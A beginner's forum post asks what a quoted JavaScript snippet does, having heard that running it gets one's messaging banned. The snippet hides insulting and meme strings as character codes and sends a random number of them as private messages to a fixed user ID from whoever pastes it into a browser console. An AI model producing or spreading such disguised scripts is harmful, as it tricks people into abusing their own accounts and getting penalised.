有人说这是运行就会被禁私信,可我才学到广搜一点看不懂,求通俗易懂的讲解(只是单纯想了解,并无其他念想)
(function() {
let words = ["78;101;118;101;114;32;103;111;110;110;97;32;103;105;118;101;32;121;111;117;32;117;112;","99;110;109;","83;66;","73;65;75;73;79;73;","49;49;52;53;49;52;","49;57;49;57;56;49;48;","115;116;111;","111;114;122;"];
let cishu = Math.floor(Math.random()*10)+1;
for(let i=1;i<=cishu;i++){
let qwq = words[Math.floor(Math.random()*words.length)];
let awa="";
let t=0;
for(let j=0;j<qwq.length;j++){
if(qwq[j]!=';'){
t*=10;
t+=parseInt(qwq[j]);
}
else{
awa+=String.fromCharCode(t);
t=0;
}
}
sendMessage(0x2109,awa)
}
})();